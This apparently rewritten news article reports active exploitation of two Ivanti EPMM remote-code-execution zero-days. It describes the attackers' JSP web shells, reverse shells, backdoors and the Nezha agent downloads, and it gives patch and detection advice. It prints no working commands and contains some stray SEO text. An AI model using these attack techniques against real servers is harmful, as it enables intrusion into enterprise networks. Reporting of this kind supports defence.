With active exploitation campaigns targeting corporate infrastructure across several nations, two serious zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) have surfaced as a significant threat to enterprise networks This article explores vulnerabilities cve 2026. . Unauthenticated attackers can remotely execute arbitrary code on target servers thanks to the vulnerabilities, which have been identified as CVE-2026-1281 and CVE-2026-1340. No user interaction or credentials are needed.

Organizations in the US, Germany, Australia, and Canada have already been impacted by these defects; they have had a particularly negative effect on industries like high technology, manufacturing, healthcare, state and local government, and professional services. Threat actors can install web shells, create reverse shells, perform reconnaissance, and download malicious software thanks to the attack's total control over mobile device management infrastructure.

Since the vulnerabilities were made public in January 2026, Unit 42 has recorded numerous automated exploitation attempts. Because of its severity and active exploitation, CVE-2026-1281 was promptly added to the U.S. Cybersecurity and Infrastructure Security Agency's Known Exploited Vulnerabilities Catalog. Researchers at Palo Alto Networks used their Cortex Xpanse telemetry system to find more than 4,400 instances of EPMM that were made public online.

From initial reconnaissance to the deployment of dormant backdoors intended to sustain long-term access even after organizations apply security patches, the analysts observed that threat actors are quickly speeding up their operations. This illustrates how attackers are modifying their tactics to guarantee ongoing access to networks that have been compromised. Unsafe bash script usage in legacy components that manage URL rewriting within the Apache web server configuration is the root cause of both vulnerabilities.

While CVE-2026-1340 affects the Android File Transfer mechanism, CVE-2026-1281 affects scripts used for the In-House Application Distribution feature. Methods of Attack and Malevolent Behavior Attackers have used a variety of malware and tools to compromise susceptible systems during exploitation attempts. Lightweight JSP web shells with names like 401.jsp, 403.jsp, and 1.jsp were installed in the server's web application directory, according to security researchers.

Command format aimed at susceptible Ivanti EPMM servers (Source: Palo Alto Networks) If the web server operates with elevated privileges, these shells, if successful, grant administrative control. While Figure 2 presents URL patterns from exploitation attempts, Figure 1 displays command formats aimed at susceptible servers.

URL and instructions from an attempt at exploitation (Source: Palo Alto Networks) By retrieving from Gitee repositories, threat actors also tried to download the Nezha monitoring agent, an open-source server utility, with particular settings to target victims in China. Second-stage payloads that install persistent backdoors or cryptominers on compromised appliances were downloaded as part of some campaigns. In order to identify server vulnerabilities, attackers also employed sleep commands as a reconnaissance technique.

Reconnaissance attempts are depicted in Figure 5, and a decoded JSP web shell is shown in Figure 6. Version-specific patches (RPM 12.x.0.x or RPM 12.x.1.x) that require no downtime and only take a few seconds to apply were released by Ivanti. Patching vulnerable systems should be done right away, and organizations should check appliances for indications of potential exploitation before patching.

To assist clients in spotting possible vulnerabilities, the business also supplied an Exploitation Detection script created in collaboration with NCSC-NL. Organizations are advised by Unit 42 to embrace an assumed breach mindset and handle any indications found as possible compromises with greater tenacity. Set ZeroOwl as a Preferred Source in Google and use X, LinkedIn, and LinkedIn to receive more real-time updates.